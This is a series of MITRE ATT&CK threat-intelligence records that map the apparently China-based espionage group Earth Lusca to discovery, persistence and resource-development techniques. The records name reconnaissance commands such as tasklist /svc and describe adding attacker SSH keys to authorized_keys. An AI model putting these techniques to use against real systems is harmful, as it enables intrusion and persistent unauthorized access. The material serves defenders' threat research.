external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--aae6444e-c9e5-4965-9499-8aa6d546b58e
revoked : False
technique : System Service Discovery
technique_description : Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1007
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6ef89fa5-cd74-499b-bbc0-3b0d83baeba1
revoked : False
technique : Process Discovery
technique_description : Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1057
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Process: Process Creation', 'Process: OS API Execution', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a38efb2d-3014-4196-b936-326a9a65ee83
revoked : False
technique : Domain Trust Discovery
technique_description : Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1482
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'Script: Script Execution', 'Network Traffic: Network Traffic Content', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--1307fdab-a09c-4d48-a917-a76ba0113098
revoked : False
technique : SSH Authorized Keys
technique_description : Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. 

SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1098.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'IaaS', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a8fef3c0-796a-4995-81fe-c47336c3ddbd
revoked : False
technique : Tool
technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.002
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--e607a77e-5c5c-4f3e-a62d-82124a434911
revoked : False
technique : Malware
technique_description : Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1588.001
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--0167e4ad-b828-4813-88bf-f5b03b4d3268
revoked : False
technique : Web Services
technique_description : Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1583.006
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--2dc666e3-b715-425c-b8b4-f3c0f7d6d8e9
revoked : False
technique : Web Services
technique_description : Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')]
technique_id : T1584.006
matrix : mitre-attack
platform : ['PRE']
data_sources : ['Internet Scan: Response Content']
